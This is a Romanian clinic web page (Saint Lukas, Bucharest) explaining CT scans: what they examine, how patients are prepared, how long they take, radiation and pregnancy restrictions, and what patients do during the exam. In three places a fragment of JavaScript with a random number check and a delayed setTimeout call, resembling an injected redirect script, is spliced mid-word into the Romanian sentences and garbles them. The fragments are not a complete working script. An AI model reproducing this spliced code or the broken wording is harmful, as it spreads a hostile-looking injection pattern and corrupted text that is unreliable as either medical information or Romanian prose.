Computer Tomograf

Cateva detalii despre aceasta procedura prin computerul tomograf

Aceasta metoda de investigatie imagistica este extrem de precisa, atraumatica pentru pacient si foarte rapida, ce utilizeaza radiatia X pentru a obtine imagini clare, de inalta rezolutie si extrem de precise, ale organelor interne.

Metoda aceasta este destinata in special pentru examinarea urmatoarelor parti ale pacientilor: cap, gat, torace, abdomen, pelvis, sistem vascular si musculo-scheletal.

In functie de software-ul utilizat, cu ajutorul rezultatelor acestei investigatii exacte este posibila reconstrucţia 3D a diferitelor organe ale corpului uman, a sistemului vascular sau a articulatiilor si a coloanei vertebrale intr-un mod virtual. Acest lucrur permite medicului specialist o analizaree anatomica completa si, in anumite cazuri, si din punct de vedere al functionalitatii. Tomografia computerizata (CT) este metoda recomandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andata pentru prima intentie in investigarea accidentelor vasculare cerebrale.

De retinut!

 • Metoda de examinare prin computerul tomograf este complet atraumatică pentru pacient.
 • Cantitatea de radiatie X folosită in permanenta optimizata de acesta aparat pentru a se obtine un maxim de informatie cu expunerea minima a pacientului.
 • In exploatare comuterul tomograf emite un sunet slab ce nu necesita protectie speciala pentru pacient.

Informatii generale despre examinarea cu ajutorul computerului tomograf

Pregatirea pacientului

Contact

+4.0727.99.96.02

office@saintlukas.ro

Calea Plevnei nr. 137 C, Bucuresti, Sector 6 Bucuresti, Romania 06001

+4.021.367.32.05

 • Inaintea oricarei examinari cu ajutorul computerului tomograf pacientul va trebui sa completeze un chestionar, indrumat, evident, de personalul din cadrul clinicii medicale Saint Lukas. Apoi, dupa interpretarea acestui chestionar se va verifica eligibilitatea pacientului pentru investigatia CT.
 • Pentru anumite variante de examinari CT este necesara pregatirea pacientului inainte aceasta de procedura. Aceasta pregatire se face prin administrarea orala a unor substante de contrast si/sau injectarea intravenoasa a unei substante de contrast in a doua parte a examinarii, substanta care va facilita un diagnostic cat mai corect si complet al afectiunilor ce urmeaza a fi investigate.
 • In cazul in care pacientul a efectuat o examinare radiologica cu bariu (inclusiv irigografie) anterior examinarii CT, este absolut necesar ca intre cele doua investigatii sa treaca un anumit timp de minim de 2-3 zile.
 • Instructiunile specifice fiecarui tip de examinare cu ajutorul computerului tomograf vor fi comunicate de personalul specialistm din cadrul clinicii medicale Saint Lukas, fiecarui pacient in parte, tinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and cont de specificitatea investigatiei si tipul afectiunii ce urmeaza a fi examinata.
 • Pentru unele investigatii CT, pacientul va trebui sa realizeze un set de analize de laborator, inainte de examinare.

Cat dureaza o investigatie CT?

 • In general o investigatie CT dureaza aproximativ 15-20 de minute.

Cat de sigura este investigatia CT?

 • Investigatia imagistica cu ajutorul computerului tomograf implica absorbtia de catre pacient a unei anumite doze de radiatie X. Astfel, medicul specialist este singura persoana in care va decide daca riscul expunerii pacientului la o asemenea investigatie este necesar sau nu.
 • Exista cateva restrictii severe pentru examinarea CT pentru femeile care se afla in 3 luni de sarcina, exceptie facandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and cazul extrem in care viata mamei depinde de aceasta examinare CT(de exemplu: in cazul unui anevrism cerebral rupt). Datorita acestui lucru este foarte important ca pacienta in cauza sa anunte medicul specialist ca este insarcinata, inainte etapei de pregatire.

Ce trebuie sa faca pacientul in timpul unei examninari CT?

 • Pacientul va fi nevoit sa stea culcat pe masa aparatului de examinare, in general pe spate.
 • Pacientul trebuie sa stea nemiscat pe toate perioada examinarii CT.
 • Pacientul trebuie sa nu poarte absolut deloc bijuterii pe perioada examinarii CT.